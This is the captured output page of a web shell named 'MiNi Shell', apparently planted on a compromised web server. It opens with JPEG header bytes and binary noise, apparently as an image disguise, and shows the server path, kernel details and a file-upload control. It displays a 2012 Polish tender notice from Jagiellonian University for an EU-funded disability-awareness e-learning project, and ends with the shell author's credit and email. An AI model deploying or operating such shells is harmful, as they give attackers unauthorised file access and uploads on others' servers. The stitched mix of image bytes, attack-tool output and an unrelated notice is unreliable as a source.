JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120305/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120305/67176-N-2012.html

<p class="kh_header"><b>Kraków: Wyłonienie zespołu realizującego projekt LdV nr 2011-1-LEO05-19908): Disability Awareness of Academic Teachers: Improvements through E-Learning dla Biura ds. osób niepełnosprawnych Uniwersytetu Jagiellońskiego</b><br>
<b>Numer ogłoszenia: 67176 - 2012; data zamieszczenia: 05.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Jagielloński , ul. Gołębia 24, 31-007 Kraków, woj. małopolskie, tel. 012 4324450, faks 012 4324451.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uj.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłonienie zespołu realizującego projekt LdV nr 2011-1-LEO05-19908): Disability Awareness of Academic Teachers: Improvements through E-Learning dla Biura ds. osób niepełnosprawnych Uniwersytetu Jagiellońskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W szczególności w zakres obowiązków wykonawcy/ów będzie wchodziło:

CZĘŚĆ I
Project manager:
	Zarządzanie pracami zespołu roboczego projektu DARe-Learning 
	Przygotowywanie spotkań Quality Management Group oraz ich prowadzenie 
	Opracowanie harmonogramu spotkań ponadnarodowych, seminariów i wizyt studyjnych we współpracy z partnerami projektu 
	Prowadzenie partnerskich spotkań ponadnarodowych 
	Opracowanie strategii działania w ramach Equality Awareness Days - organizacja wydarzeń z tym związanych 
	Redakcja Biuletynu informacyjnego 
	Zarządzanie działaniami projektu na poziomie krajowym i europejskim 
	Upowszechnianie rezultatów projektu na konferencjach krajowych i międzynarodowych oraz podczas wizyt studyjnych 
	Raportowanie

CZĘŚĆ II
Teacher/Trainer/Researcher
	Współpraca z zespołem informatyków przygotowujących kurs DARe-Learning - materiały edukacyjne, zawartość merytoryczna strony, ukazanie zagadnień świadomościowych w wersji zdalnej 
	Opracowanie podręcznika dla trenera
	Współpraca z partnerami w opracowaniu i adaptacji ich wersji podręcznika dla trenera Współpraca z podwykonawcami w tworzeniu multimedialnych materiałów szkoleniowych 
	Współpraca z podwykonawcami w opracowaniu materiałów promocyjnych oraz szaty graficznej strony internetowej projektu
	Wybór materiałów edukacyjnych do upowszechniania w ramach Biuletynu informacyjnego oraz na stronie internetowej 
	Współpraca w przygotowaniu Equality Awareness Days 
	Testowanie - opracowanie materiałów i prowadzenie szkoleń testowych
	Upowszechnianie rezultatów projektu na konferencjach krajowych i międzynarodowych oraz podczas wizyt studyjnych
	Raportowanie
CZĘŚĆ III
Teacher/Trainer/Researcher
	Współpraca w opracowaniu podręcznika dla trenera w ramach projektu DARe-Learning 
	Opracowanie akcji informacyjnych w ramach Equality Awareness Days 
	Współpraca z podwykonawcami w tworzeniu multimedialnych materiałów szkoleniowych 
	Monitoring i ewaluacja rezultatów projektu 
	Przygotowanie spotkań partnerskich - prezentacje merytoryczne postępów prac 
	Upowszechnianie rezultatów projektu na konferencjach krajowych i międzynarodowych oraz podczas wizyt studyjnych 
	Raportowanie.

CZĘŚĆ IV
Administrative - Finance Manager
	Monitoring wydatkowania środków finansowych projektu DAREe-Learning w zgodności z zasadami finansowania programu Uczenie się przez całe życie oraz procedurami wewnętrznymi UJ 
	Współpraca z jednostkami wewnętrznymi UJ w zakresie gromadzenia dokumentacji koniecznej do procesu raportowania pod względem administracyjnym i finansowym 
	Administrowanie  projektem w imieniu instytucji promotora 
	Współpraca z Krajową Agencją Programu Uczenie się przez całe życie w zakresie spraw administracyjnych i finansowych w związku z działaniem i rozliczaniem projektu 
	Współpraca z partnerami projektu w zakresie wydatkowania środków finansowych w zgodzie z harmonogramem i zasadami programu Uczenie się przez całe życie
	Raportowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do formularza oferty będącego integralną częścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do formularza oferty będącego integralną częścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do formularza oferty będącego integralną częścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi zapewnić do realizacji zamówienia osobę/osoby posiadające:
Część I - 
1.	Minimum 5-letnie doświadczenie w zarządzaniu międzynarodowym zespołem realizującym europejskie projekty pilotażowe (budżet od 200 000 tys. euro).
2.	Koordynacja co najmniej dwóch pozytywnie ocenionych i finansowo rozliczonych pilotażowych projektów europejskich.
3.	Bardzo dobra i udokumentowana znajomość języka angielskiego ze szczególnym uwzględnieniem Business English.
4.	Ukończone studia wyższe.
5.	Znajomość problematyki niepełnosprawności w Grecji, Francji oraz Czechach, ze szczególnym uwzględnieniem sytuacji edukacyjnej studentów niepełnosprawnych.
6.	Udokumentowane doświadczenie w pisaniu profesjonalnych tekstów.
7.	Publikacje dotyczące nowoczesnego modelu niepełnosprawności wydane drukiem lub wygłoszone na prestiżowych konferencjach międzynarodowych.
8.	Udokumentowana wiedza ekspercka dotycząca społecznego modelu niepełnosprawności oraz problematyki osób niepełnosprawnych w dostępie do kształcenia uniwersyteckiego.
9.	Znajomość nowoczesnych technologii wspierających proces edukacyjny osób niepełnosprawnych.
10.	Udział w projektach międzynarodowych zwiększających kwalifikacje zawodowe nauczycieli akademickich z roboczym językiem angielskim.
11.	Doświadczenie w pracy na uczelni publicznej

Część II -
1.	Ukończone studia wyższe w zakresie nauk humanistycznych.
2.	Znajomość problematyki niepełnosprawności w Grecji, Francji oraz Czechach, ze szczególnym uwzględnieniem sytuacji edukacyjnej studentów niepełnosprawnych.
3.	Znajomość języka angielskiego na poziomie bardzo dobrym w mowie i piśmie. 
4.	Doświadczenie (min. 5-letnie) w pracy ze studentami niepełnosprawnymi oraz kadrą akademicką w zakresie świadczenia studentom niepełnosprawnym usług wsparcia edukacyjnego zgodnego z nowoczesnym myśleniem o niepełnosprawności.
5.	Udokumentowana wiedza ekspercka dotycząca społecznego modelu niepełnosprawności oraz problematyki osób niepełnosprawnych w dostępie do kształcenia uniwersyteckiego.
6.	Udokumentowane kompetencje trenera umiejętności społecznych. 
7.	Doświadczenie w zakresie przygotowywania szkoleń dla kadry akademickiej w zakresie budowania świadomości niepełnosprawności. 
8.	Doświadczenie w pracy w projektach międzynarodowych z roboczym językiem angielskim. 
9.	Doświadczenie w pracy na uczelni publicznej. 
10.	Doświadczenie w zakresie prowadzenia szkoleń w obszarze niepełnosprawności przynajmniej w jednym z krajów partnerstwa. 
11.	Doświadczenie w tworzeniu scenariuszy szkoleń e-learningowych w zakresie budowania świadomości niepełnosprawności

Część III -
1.	Ukończone studia wyższe kierunkowe (pedagogika, psychologia lub socjologia).
2.	Bardzo dobra znajomość języka angielskiego w mowie i piśmie.
3.	Doświadczenie (min. 5-letnie) w pracy na uczelni publicznej ze studentami niepełnosprawnymi oraz kadrą akademicką w zakresie świadczenia studentom niepełnosprawnym usług wsparcia edukacyjnego zgodnego z nowoczesnym myśleniem o niepełnosprawności.
4.	Doświadczenie współpracy z partnerami projektów międzynarodowych (w j. angielskim) dotyczącej opracowywania materiałów edukacyjnych dla nauczycieli akademickich zwiększających ich wiedzę w obrębie społecznego modelu niepełnosprawności.
5.	Znajomość problematyki niepełnosprawności w Grecji, Francji oraz Czechach ze szczególnym uwzględnieniem sytuacji edukacyjnej studentów niepełnosprawnych.
6.	Udokumentowana wiedza ekspercka dotycząca społecznego modelu niepełnosprawności oraz problematyki osób niepełnosprawnych w dostępie do kształcenia uniwersyteckiego.
7.	Udokumentowana znajomość SJM (min. I poziom) oraz podstaw PJM (umiejętności praktyczne oraz wiedza socjolingwistyczna); znajomość kultury Głuchych w Polsce oraz orientacja w tym obszarze w Grecji, Francji i Czechach.
8.	Znajomość nowoczesnych technologii wspierających proces edukacyjny osób niepełnosprawnych.
9.	Opublikowane artykuły o charakterze naukowym lub publicystycznym (dotyczące nowoczesnego myślenia o niepełnosprawności oraz kształcenia osób niepełnosprawnych) w prestiżowych wydawnictwach.
10.	Prezentacje dotyczące niepełnosprawności wygłaszane na konferencjach krajowych i międzynarodowych - udokumentowane.
11.	Doświadczenie w przeprowadzaniu monitoringu oraz ewaluacji projektów z funduszy europejskich z uwzględnieniem specyfiki potrzeb osób niepełnosprawnych (w tym doświadczenie w konstruowaniu narzędzi badawczych dostępnych dla osób niepełnosprawnych).

Część IV -
1.	Znajomość procedur wydatkowania środków finansowych (w ramach projektów realizowanych ze środków zewnętrznych) na Uniwersytecie Jagiellońskim.
2.	Znajomość zasad programu Uczenie się przez całe życie ze szczególnym uwzględnieniem programu Leonardo da Vinci.
3.	Min. 3 letnie doświadczenie w finansowym administrowaniu projektu w ramach programu Leonardo da Vinci, w szczególności w przygotowywaniu raportów finansowych.
4.	Doświadczenie w pracy na uczelni publicznej wyższej.
5.	Doświadczenie we współpracy z partnerami międzynarodowymi (w j. angielskim) w zakresie administracji i rozliczeń projektów finansowanych ze środków Programu Leonardo da Vinci.
6.	Ukończone studia wyższe (kierunek ekonomiczny).
7.	Certyfikat potwierdzający znajomość business English.
8.	Odbyte szkolenie z zakresu świadomości niepełnosprawności zgodne ze społecznym modelem niepełnosprawności.


Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty oraz wykaz osób, których wzór stanowi załącznik nr 1 i nr 2 do formularza oferty będącego integralną częścią SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do formularza oferty będącego integralną częścią SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uj.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Uniwersytetu Jagiellońskiego, ul. Gołębia 6/2, 31-007 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2012 godzina 10:00, miejsce: Biuro Zamówień Publicznych Uniwersytetu Jagiellońskiego, ul. Gołębia 6/2, 31-007 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt LdV nr 2011-1-LEO05-19908.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com